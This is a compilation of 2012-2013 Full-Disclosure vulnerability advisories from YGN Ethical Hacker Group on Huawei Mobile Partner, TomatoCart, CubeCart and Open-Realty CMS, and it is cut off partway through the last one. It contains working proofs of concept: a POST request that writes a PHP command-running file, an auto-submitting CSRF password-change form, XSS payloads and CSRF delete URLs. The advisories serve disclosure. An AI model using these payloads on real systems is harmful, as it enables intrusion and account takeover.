[Full-disclosure] Huawei Mobile Partner | Permission Weakness Local Privilege Escalation

2013-02-11 Thread YGN Ethical Hacker Group
1. DESCRIPTION

Huawei Mobile Partner application contains a flaw that may allow an
attacker to gain access to unauthorized privileges. The issue is due
to the application installing with insecure permissions. This allows a
less privileged local attacker or compromised process to replace the
original application binary with a malicious application which will be
executed by a victim user or upon Mobile Partner application Windows
service restart.


2. BACKGROUND

Mobile Partner is a built-in application in Huawei 3G USB modems that
allow you to connect to the 3G mobile network for Internet access. It
is widely used by many telcos round the world.


3. VERSIONS AFFECTED

Tested version: 23.007.09.00.203.


4. PROOF-OF-CONCEPT/EXPLOIT

 Tested on Windows

c:\wmic service get pathname | find Mobile Partner
C:\Program Files (x86)\Mobile Partner\UpdateDog\ouc.exe
C:\Program Files (x86)\Mobile Partner\eap\wifimansvc.exe

c:\accesschk -q C:\Program Files (x86)\Mobile Partner\UpdateDog\ouc.exe
C:\Program Files (x86)\Mobile Partner\UpdateDog\ouc.exe
  RW Everyone
  RW BUILTIN\Users

c:\accesschk -q C:\Program Files (x86)\Mobile Partner\eap\wifimansvc.exe
C:\Program Files (x86)\Mobile Partner\eap\wifimansvc.exe
  RW Everyone
  RW BUILTIN\Users

c:\accesschk -q C:\Program Files (x86)\Mobile Partner\Mobile Partner.exe
C:\Program Files (x86)\Mobile Partner\Mobile Partner.exe
  RW Everyone
  RW BUILTIN\Users


/// Tested on Mac

YEHG:MacOS tester$ ls -Rl /Applications/Mobile\ Partner.app/ | grep
rwxrwxrwx | grep \(app\|mobilepartner\)
-rwxrwxrwx 1 root admin 82496 Oct 6 17:34 mobilepartner
drwxrwxrwx 3 root admin 102 Oct 6 17:34 XStartScreen.app
drwxrwxrwx 3 root admin 102 Oct 6 17:34 LiveUpd.app
drwxrwxrwx 3 root admin 102 Oct 6 17:34 ouc.app


5. SOLUTION

The vendor has not responded to our security report for months.
Workaround is to remove WRITE attribute permission on all Mobile
Partner executable files for non-administrator and non-system
accounts.


6. VENDOR

Huawei Technologies Co.,Ltd


7. CREDIT

Myo Soe, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


8. DISCLOSURE TIME-LINE

2012-10-xx: Contacted the vendor through publicly mentioned emails and forums
2013-02-11: No response
2013-02-11: Vulnerability not fixed
2013-02-11: Vulnerability disclosed


9. REFERENCES

Original Advisory URL:
http://core.yehg.net/lab/pr0js/advisories/huawei_mobile_partner-insecure_permission

#yehg [2013-02-11]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] TomatoCart 1.x | Cross Site Request Forgery Protection Bypass via JavaScript Hijacking

2013-01-06 Thread YGN Ethical Hacker Group
1. OVERVIEW

TomatoCart 1.x versions are vulnerable to Cross Site Request Forgery
Protection Bypass.


2. BACKGROUND

TomatoCart is an innovative Open Source shopping cart solution
developed by Wuxi Elootec Technology Co., Ltd. It is forked from
osCommerce 3 as a separate project and is released under the GNU
General Public License V2. Equipped with the web2.0 Technology Ajax
and Rich Internet applications (RIAs), TomatoCart Team is devoted to
building a landmark eCommerce solution.


3. VULNERABILITY DESCRIPTION

TomatoCart 1.x versions contain a flaw related to the script
'/admin/tocdesktop.php' failure to properly protect the JavaScript
object, token which is used to prevent Cross Site Request Forgery
attack. This allows an attacker to gain access to the token object via
JavaScript Hijacking upon an administrator user's visit to his crafted
page. Using the compromised token value, the attacker will then be
able to perform administrator-privileged functions such as uploading
file, creating user accounts and so forth.


4. VERSIONS AFFECTED

Tested on 1.x

(Note that we did not verify this issue on upcoming 2.x version -
currently it's on alpha.)


5. PROOF-OF-CONCEPT/EXPLOIT

The following recorded movie will demonstrate how we can leverage the
CSRF-bypass flaw to create an arbitrary shell script.

http://yehg.net/lab/pr0js/training/view/misc/TomatoCart-Anti-CSRF-Bypass-2-Shell/


6. SOLUTION

The vendor did not show commitment in hardening the application.
Workaround is not to visit malicious web sites during login or to use
a dedicated browser for TomatoCart administration.
It is recommended to use alternative shopping cart application with
good track record of security fixes.


7. VENDOR

Wuxi Elootec Technology Co., Ltd.


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-04-22: Contacted the vendor through email
2012-04-29: Vendor replied and the vulnerability information was sent
2013-01-07: Vulnerability not fixed
2013-01-07: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Btomatocart1.x%5D_ant-csrf_bypass
Other TomatoCart Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Btomatocart1.x%5D_arbitrary_file_creation
Other TomatoCart Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Btomatocart1.x%5D_vulnerable_piwik
TomatoCart Home Page: http://www.tomatocart.com/

#yehg [2013-01-07]

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] TomatoCart 1.x | Vulnerable Piwik Extension

2013-01-05 Thread YGN Ethical Hacker Group
1. OVERVIEW

TomatoCart 1.x versions include outdated and vulnerable Piwik extension  0.5.5.


2. BACKGROUND

TomatoCart is an innovative Open Source shopping cart solution
developed by Wuxi Elootec Technology Co., Ltd. It is forked from
osCommerce 3 as a separate project and is released under the GNU
General Public License V2. Equipped with the web2.0 Technology Ajax
and Rich Internet applications (RIAs), TomatoCart Team is devoted to
building a landmark eCommerce solution.


3. VULNERABILITY DESCRIPTION

TomatoCart 1.x versions include outdated and vulnerable Piwik
extension  0.5.5 according to the the Piwik SVN checkout date
specified in /ext/piwik/index.php. This Piwik version has known
vulnerabilities such as Cross Site Scripting, Arbitrary URL Redirect
and Denial-of-Service.


4. VERSIONS AFFECTED

1.x


5. PROOF-OF-CONCEPT/EXPLOIT

Refer to REFERENCES section for the OSVDB site URL featuring known
Piwik vulnerabilities.


6. SOLUTION

The vendor did not show commitment in hardening the application.
It is recommended to use alternative shopping cart application with
good track record of security fixes.


7. VENDOR

Wuxi Elootec Technology Co., Ltd.


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-04-22: Contacted the vendor through email
2012-04-29: Vendor replied and the vulnerability detail was sent
2013-01-05: Vulnerability not fixed
2013-01-05: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Btomatocart1.x%5D_arbitrary_file_creation
TomatoCart Home Page: http://www.tomatocart.com/
Piwik Reported Vulnerabilities:
http://osvdb.org/search/search?search%5Bvuln_title%5D=piwiksearch%5Btext_type%5D=alltextsearch%5Bs_date%5D=January+1%2C+2010search%5Be_date%5D=January+5%2C+2013

#yehg [2013-01-05]

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] TomatoCart 1.x | Unrestricted File Creation

2013-01-04 Thread YGN Ethical Hacker Group
1. OVERVIEW

TomatoCart 1.x versions are vulnerable to Unrestricted File Creation.


2. BACKGROUND

TomatoCart is an innovative Open Source shopping cart solution
developed by Wuxi Elootec Technology Co., Ltd. It is forked from
osCommerce 3 as a separate project and is released under the GNU
General Public License V2. Equipped with the web2.0 Technology Ajax
and Rich Internet applications (RIAs), TomatoCart Team is devoted to
building a landmark eCommerce solution.


3. VULNERABILITY DESCRIPTION

TomatoCart 1.x versions contain a flaw related to the /admin/json.php
script's failure to properly restrict created files. This may allow an
attacker to create arbitrary shell script to launch further attacks on
the application server.


4. VERSIONS AFFECTED

Tested on 1.1.8, 1.1.5


5. PROOF-OF-CONCEPT/EXPLOIT

/
POST /admin/json.php HTTP/1.1
Host: localhost
Cookie: admin_language=en_US; toCAdminID=edfd1d6b88d0c853c2b83cc63aca5e14
Content-Type: application/x-www-form-urlencoded
Content-Length: 195

module=file_manageraction=save_filefile_name=0wned.phpdirectory=/token=edfd1d6b88d0c853c2b83cc63aca5e14ext-comp-1277=0wned.phpcontent=?+echo
'h10wned!/h1pre';+echo `ls+-al`; ?
///


6. SOLUTION

The vendor did not show commitment in hardening the application.
It is recommended to use alternative shopping cart application with
good track record of security fixes.


7. VENDOR

Wuxi Elootec Technology Co., Ltd.


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-04-22: Contacted the vendor through email
2012-04-29: Vendor replied and the vulnerability detail was sent
2013-01-04: Vulnerability not fixed
2013-01-04: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Btomatocart1.x%5D_arbitrary_file_creation
TomatoCart Home Page: http://www.tomatocart.com/

#yehg [2013-01-04]

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] CubeCart 5.0.7 and lower versions | Insecure Backup File Handling

2013-01-01 Thread YGN Ethical Hacker Group
5.x only


On Sat, Dec 29, 2012 at 11:02 AM, Sean Jenkins s...@bluehost.com wrote:
 Is it known if this exploit affects CubeCart versions 3.x and/or 4.x, or
 just 5.0.[0..6]?

 Sean Jenkins
 Sr. System Administrator


 On 12/28/2012 8:13 AM, YGN Ethical Hacker Group wrote:

 1. OVERVIEW

 CubeCart 5.0.7 and lower versions are vulnerable to Insecure Backup
 File Handling which leads to the disclosure of the application
 configuration file.


 2. BACKGROUND

 CubeCart is an out of the box ecommerce shopping cart software
 solution which has been written to run on servers that have PHP 
 MySQL support. With CubeCart you can quickly setup a powerful online
 store which can be used to sell digital or tangible products to new
 and existing customers all over the world.


 3. VULNERABILITY DESCRIPTION

 CubeCart 5.0.7 and lower versions contain a flaw that insecurely backs
 up the configuration file, global.inc.php, upon new installation or
 upgrade process. The name of backup configuration file is set to the
 year, month, day, hour, minute that the process is performed.  The
 non-randomized nature of this backup scheme allows an attacker to
 retrieve the file through brute-force method.


 4. VERSIONS AFFECTED

 5.0.7 and lower versions


 5. Affected Files

 /setup/setup.install.php
 /setup/setup.upgrade.php

 ///CODE //
 ##Backup existing config file, if it exists
 if (file_exists($global_file)) {
 rename($global_file, $global_file.'-'.date('Ymdgi'));
 }
 /

 e.g.
 http://127.0.0.1/cube507/includes/global.inc.php-2012021245719  \


 6. SOLUTION

 Upgrade to the latest CubeCart version - 5.x.


 7. VENDOR

 CubeCart Development Team
 http://cubecart.com/


 8. CREDIT

 Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


 9. DISCLOSURE TIME-LINE

 2012-03-24: Vulnerability reported
 2012-12-28: Vulnerability disclosed


 10. REFERENCES

 Original Advisory URL:
 http://yehg.net/lab/pr0js/advisories/%5Bcubecart_5.0.7%5D_insecure-backup
 CubeCart Home Page: http://cubecart.com/

 #yehg [2012-12-28]

 -
 Best regards,
 YGN Ethical Hacker Group
 Yangon, Myanmar
 http://yehg.net
 Our Lab | http://yehg.net/lab
 Our Directory | http://yehg.net/hwd



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] CubeCart 5.x | Cross Site Request Forgery (CSRF) Vulnerability

2013-01-01 Thread YGN Ethical Hacker Group
1. OVERVIEW

CubeCart 5.x versions are vulnerable to Cross Site Request Forgery (CSRF).


2. BACKGROUND

CubeCart is an out of the box ecommerce shopping cart software
solution which has been written to run on servers that have PHP 
MySQL support. With CubeCart you can quickly setup a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.


3. VULNERABILITY DESCRIPTION

CubeCart 5.x versions contain a flaw that allows a remote Cross-site
Request Forgery (CSRF / XSRF) attack. The flaw exists because the
application does not require multiple steps or explicit confirmation
for sensitive transactions for majority of administrator functions
such as adding new user, assigning user to administrative privilege.
By using a crafted URL, an attacker may trick the victim into visiting
to his web page to take advantage of the trust relationship between
the authenticated victim and the application. Such an attack could
trick the victim into executing arbitrary commands in the context of
their session with the application, without further prompting or
verification.


4. VERSIONS AFFECTED

5.x


5. Proof-of-Concept

http://localhost/admin.php?_g=documentsnode=indexdelete=1 (Delete
file in Site Documents)
http://localhost/admin.php?_g=filemanagermode=digitaldelete=1
(Delete file in File Manager)
http://localhost/admin.php?_g=settingsnode=adminsaction=editadmin_id=2
(Delete user)
http://localhost/admin.php?_g=customerssort%5Bregistered%5D=DESCaction=deletecustomer_id=1
(Delete customer user)
http://localhost/admin.php?_g=productssort%5Bupdated%5D=DESCdelete=1
(Delete product)


6. SOLUTION

The vendor has chosen not to fix the issue.
Workaround is not to visit malicious sites during log-in.


7. VENDOR

CubeCart Development Team
http://cubecart.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-12-22: Vulnerability disclosed
2012-12-24: The vendor replied that the fix would not be implemented.
2013-01-01: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bcubecart_5x%5D_csrf
CubeCart Home Page: http://cubecart.com/

#yehg [2013-01-01]
-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] CubeCart 5.x | Multiple Cross Site Scripting Vulnerabilities

2013-01-01 Thread YGN Ethical Hacker Group
1. OVERVIEW

CubeCart 5.x versions are vulnerable to Cross Site Scripting.


2. BACKGROUND

CubeCart is an out of the box ecommerce shopping cart software
solution which has been written to run on servers that have PHP 
MySQL support. With CubeCart you can quickly setup a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.


3. VULNERABILITY DESCRIPTION

Multiple parameters are not properly sanitized, which allows attacker
to conduct Cross Site Scripting attack. This may allow an attacker to
create a specially crafted URL that would execute arbitrary script
code in a victim's browser.


4. VERSIONS AFFECTED

5.x


5. Affected URLs and Parameters

/admin.php (report[date][from] parameter]
/admin.php (report[date][to] parameter)
/index.php (review[email] parameter)
/index.php (review[name] parameter)
/index.php (review[title] parameter)
/admin.php (report[date][from] parameter)


6. SOLUTION

The vendor has chosen not to fix the issue.


7. VENDOR

CubeCart Development Team
http://cubecart.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-12-22: Vulnerability disclosed
2012-12-24: The vendor replied that the fix would not be implemented.
2013-01-01: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bcubecart_5x%5D_xss
CubeCart Home Page: http://cubecart.com/

#yehg [2013-01-01]
-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] CubeCart 5.0.7 and lower versions | Insecure Backup File Handling

2012-12-28 Thread YGN Ethical Hacker Group
1. OVERVIEW

CubeCart 5.0.7 and lower versions are vulnerable to Insecure Backup
File Handling which leads to the disclosure of the application
configuration file.


2. BACKGROUND

CubeCart is an out of the box ecommerce shopping cart software
solution which has been written to run on servers that have PHP 
MySQL support. With CubeCart you can quickly setup a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.


3. VULNERABILITY DESCRIPTION

CubeCart 5.0.7 and lower versions contain a flaw that insecurely backs
up the configuration file, global.inc.php, upon new installation or
upgrade process. The name of backup configuration file is set to the
year, month, day, hour, minute that the process is performed.  The
non-randomized nature of this backup scheme allows an attacker to
retrieve the file through brute-force method.


4. VERSIONS AFFECTED

5.0.7 and lower versions


5. Affected Files

/setup/setup.install.php
/setup/setup.upgrade.php

///CODE //
##Backup existing config file, if it exists
if (file_exists($global_file)) {
rename($global_file, $global_file.'-'.date('Ymdgi'));
}
/

e.g.
http://127.0.0.1/cube507/includes/global.inc.php-2012021245719  \


6. SOLUTION

Upgrade to the latest CubeCart version - 5.x.


7. VENDOR

CubeCart Development Team
http://cubecart.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-03-24: Vulnerability reported
2012-12-28: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bcubecart_5.0.7%5D_insecure-backup
CubeCart Home Page: http://cubecart.com/

#yehg [2012-12-28]

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Open-Realty CMS 3.x | Cross Site Request Forgery (CSRF) Vulnerability

2012-12-25 Thread YGN Ethical Hacker Group
1. OVERVIEW

Open-Realty CMS 3.x versions are vulnerable to Cross Site Request Forgery.


2. BACKGROUND

Open-Realty is the world's leading real estate listing marketing and
management CMS application, and has enjoyed being the real estate web
site software of choice for professional web site developers since
2002.


3. VULNERABILITY DESCRIPTION

Open-Realty 3.x versions contain a flaw that allows a remote
Cross-site Request Forgery (CSRF / XSRF) attack. The flaw exists
because the application does not require multiple steps or explicit
confirmation for sensitive transactions for majority of administrator
functions such as adding new user, assigning user to administrative
privilege. By using a crafted URL, an attacker may trick the victim
into visiting to his web page to take advantage of the trust
relationship between the authenticated victim and the application.
Such an attack could trick the victim into executing arbitrary
commands in the context of their session with the application, without
further prompting or verification.


4. VERSIONS AFFECTED

3.x


5. PROOF-OF-CONCEPT/EXPLOIT

 !-- Change Password --
form action=http://127.0.0.1/admin/ajax.php?action=ajax_update_user_data;
method=POST
  input type=hidden name=user#95;id value=2 /
  input type=hidden name=user#95;first#95;name value=Well /
  input type=hidden name=user#95;last#95;name value=Smith /
  input type=hidden name=user#95;email value=hacker#64;yehg.net /
  input type=hidden name=phone value=123456789 /
  input type=hidden name=mobile value=9151403793 /
  input type=hidden name=fax value= /
  input type=hidden name=homepage value=http#58;#47;#47;yehg.net /
  input type=hidden name=info value=test /
  input type=hidden name=edit#95;user#95;pass value=agent /
  input type=hidden name=edit#95;user#95;pass2 value=agent /
  input type=submit value=Submit form /
/form
script
  document.forms[0].submit();
/script


6. SOLUTION

The vendor has not responded to the report since 2012-11-17.
It is recommended that an alternate software package be used in its place.


7. VENDOR

Transparent Technologies Inc.
http://www.transparent-support.com


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-11-17: Vulnerability Reported
2012-12-25: Vulnerability Disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bopen-realty_3.x%5D_csrf
Open-Realty Home Page: http://www.open-realty.org/


#yehg [2012-12-25]

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Open-Realty CMS 3.x | Persistent Cross Site Scripting (XSS) Vulnerability

2012-12-25 Thread YGN Ethical Hacker Group
1. OVERVIEW

Open-Realty CMS 3.x versions are vulnerable to Persistent Cross Site
Scripting (XSS).


2. BACKGROUND

Open-Realty is the world's leading real estate listing marketing and
management CMS application, and has enjoyed being the real estate web
site software of choice for professional web site developers since
2002.


3. VULNERABILITY DESCRIPTION

Multiple parameters are not properly sanitized, which allows attacker
to conduct Cross Site Scripting attack. This may allow an attacker to
create a specially crafted URL that would execute arbitrary script
code in a victim's browser.


4. VERSIONS AFFECTED

3.x


5. PROOF-OF-CONCEPT/EXPLOIT

/admin/ajax.php (parameter: title, full_desc, ta)

///

POST /admin/ajax.php?action=ajax_update_listing_data HTTP/1.1
Host: localhost
Content-Length: 574
Origin: http://localhost
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=854a264c2f7766cea2edbfce6ffb02e7;

edit=7305title=test'%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3Estate=AKzip=222country=neighborhood=price=beds=baths=floors=year_built=garage_size=sq_feet=lot_size=prop_tax=status=Activemls=full_desc='%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3Eseotitle=test-7002edit_active=yesmlsexport=noor_owner=2notes=66address=aaacity=aaastate=AKzip=222country=neighborhood=price=beds=baths=floors=year_built=garage_size=sq_feet=lot_size=prop_tax=status=Activemls=home_features%5B%5D=community_features%5B%5D=openhousedate=

///
POST /admin/ajax.php?action=ajax_update_blog_post HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Content-Length: 112
Origin: http://localhost
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/admin/index.php?action=edit_blog_postid=65
Cookie: PHPSESSID=e2c83ff285b488f33d2c830979a38e09;

blogID=65title=about+usta='scriptalert('Error')/scriptdescription=keywords=status=1seotitle=about-us
///


6. SOLUTION

The vendor has not responded to the report since 2012-11-17.
It is recommended that an alternate software package be used in its place.


7. VENDOR

Transparent Technologies Inc.
http://www.transparent-support.com


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-11-17: Vulnerability Reported
2012-12-25: Vulnerability Disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bopen-realty_2.5.8_2.x%5D_xss
Open-Realty Home Page: http://www.open-realty.org/


#yehg [2012-12-25]

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] CubeCart 5.0.7 and lower | Open URL Redirection Vulnerability

2012-12-24 Thread YGN Ethical Hacker Group
1. OVERVIEW

CubeCart 5.0.7 and lower versions are vulnerable to Open URL Redirection.


2. BACKGROUND

CubeCart is an out of the box ecommerce shopping cart software
solution which has been written to run on servers that have PHP 
MySQL support. With CubeCart you can quickly setup a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.


3. VULNERABILITY DESCRIPTION

CubeCart 5.0.7 and lower versions contain a flaw that allows a remote
cross site redirection attack. This flaw exists because the
application does not properly sanitise the redir parameter.  This
allows an attacker to create a specially crafted URL, that if clicked,
would redirect a victim from the intended legitimate web site to an
arbitrary web site of the attacker's choice.


4. VERSIONS AFFECTED

5.0.7 and lower


5. Affected URL and Parameter

/admin.php (redir parameter)
/admin.php?redir=//yehg.net/%3f (Redirect after login)


6. SOLUTION

Upgrade to the latest CubeCart version - 5.x.


7. VENDOR

CubeCart Development Team
http://cubecart.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-03-24: Vulnerability reported
2012-12-24: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bcubecart_5.0.7%5D_open_url_redirection
CubeCart Home Page: http://cubecart.com/

#yehg [2012-12-24]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] CubeCart 4.4.6 and lower | Multiple Cross Site Scripting Vulnerabilities

2012-12-24 Thread YGN Ethical Hacker Group
1. OVERVIEW

CubeCart 4.4.6 and lower versions are vulnerable to Cross Site Scripting.


2. BACKGROUND

CubeCart is an out of the box ecommerce shopping cart software
solution which has been written to run on servers that have PHP 
MySQL support. With CubeCart you can quickly setup a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.


3. VULNERABILITY DESCRIPTION

Multiple parameters are not properly sanitized, which allows attacker
to conduct Cross Site Scripting attack. This may allow an attacker to
create a specially crafted URL that would execute arbitrary script
code in a victim's browser.


4. VERSIONS AFFECTED

4.4.6 and lower


5. Affected URLs and Parameters

/admin.php (countiesPage parameter)
/admin.php (countriesPage parameter)
/admin.php (dStart parameter)
/admin.php (edit parameter)
/admin.php (email parameter)
/admin.php (FCKeditor parameter)
/admin.php (gc%5Bmax%5D parameter)
/admin.php (gc%5Bmin%5D parameter)
/admin.php (gc%5BproductCode%5D parameter)
/admin.php (gc%5Bweight%5D parameter)
/admin.php (gc[max] parameter)
/admin.php (gc[min] parameter)
/admin.php (gc[productCode] parameter)
/admin.php (gc[weight] parameter)
/admin.php (loc]
/admin.php (page parameter)
/admin.php (prod_master_id parameter)
/admin.php (searchStr parameter)
/admin.php (thumbName[] parameter)
/admin.php (User-Agent HTTP header)
/admin.php (yStart parameter)
/index.php (Referer HTTP header)


6. SOLUTION

The CubeCart 4.x version family is no longer maintained by the vendor.
Upgrade to the currently supported latest CubeCart version - 5.x.


7. VENDOR

CubeCart Development Team
http://cubecart.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-12-22: CubeCart 4.x in End-of-Support/Maintenance circle
2012-12-24: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bcubecart_4.4.6%5D_xss
CubeCart Home Page: http://cubecart.com/
CubeCart Bug-Fix Announcement:
http://forums.cubecart.com/topic/45456-cubecart-447-released/
CubeCart4 End-of-Life Announcement:
http://forums.cubecart.com/topic/46765-cubecart-v4-end-of-life-saturday-22-december/

#yehg [2012-12-24]

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] CubeCart 4.4.6 and lower | Multiple SQL Injection Vulnerabilities

2012-12-24 Thread YGN Ethical Hacker Group
1. OVERVIEW

The CubeCart 4.4.6 and lower versions are vulnerable to SQL Injection.


2. BACKGROUND

CubeCart is an out of the box ecommerce shopping cart software
solution which has been written to run on servers that have PHP 
MySQL support. With CubeCart you can quickly setup a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.


3. VULNERABILITY DESCRIPTION

Multiple parameters are not properly sanitized, which allows attacker
to conduct  SQL Injection attack. This could an attacker to inject or
manipulate SQL queries in the back-end database, allowing for the
manipulation or disclosure of arbitrary data.


4. VERSIONS AFFECTED

4.4.6 and lower


5. Affected URLs and Parameters

/admin.php (active parameter)
/admin.php (cat_id parameter)
/admin.php (orderCol parameter)
/admin.php (orderDir parameter)


6. SOLUTION

The CubeCart 4.x version family is no longer maintained by the vendor.
Upgrade to the currently supported latest CubeCart version - 5.x.


7. VENDOR

CubeCart Development Team
http://cubecart.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-12-22: CubeCart 4.x in End-of-Support/Maintenance circle
2012-12-24: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bcubecart_4.4.6%5D_sqli
CubeCart Home Page: http://cubecart.com/
CubeCart Bug-Fix Announcement:
http://forums.cubecart.com/topic/45456-cubecart-447-released/
CubeCart4 End-of-Life Announcement:
http://forums.cubecart.com/topic/46765-cubecart-v4-end-of-life-saturday-22-december/

#yehg [2012-12-24]
-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] CubeCart 4.4.6 and lower | Cross Site Request Forgery (CSRF) Vulnerability

2012-12-24 Thread YGN Ethical Hacker Group
1. OVERVIEW

CubeCart 4.4.6 and lower versions are vulnerable to Cross Site Request
Forgery (CSRF).


2. BACKGROUND

CubeCart is an out of the box ecommerce shopping cart software
solution which has been written to run on servers that have PHP 
MySQL support. With CubeCart you can quickly setup a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.


3. VULNERABILITY DESCRIPTION

CubeCart 4.4.6 and and lower versions contain a flaw that allows a
remote Cross-site Request Forgery (CSRF / XSRF) attack. The flaw
exists because the application does not require multiple steps or
explicit confirmation for sensitive transactions for majority of
administrator functions such as adding new user, assigning user to
administrative privilege. By using a crafted URL, an attacker may
trick the victim into visiting to his web page to take advantage of
the trust relationship between the authenticated victim and the
application. Such an attack could trick the victim into executing
arbitrary commands in the context of their session with the
application, without further prompting or verification.


4. VERSIONS AFFECTED

4.4.6 and lower


5. Proof-of-Concept


Add Admin User
==
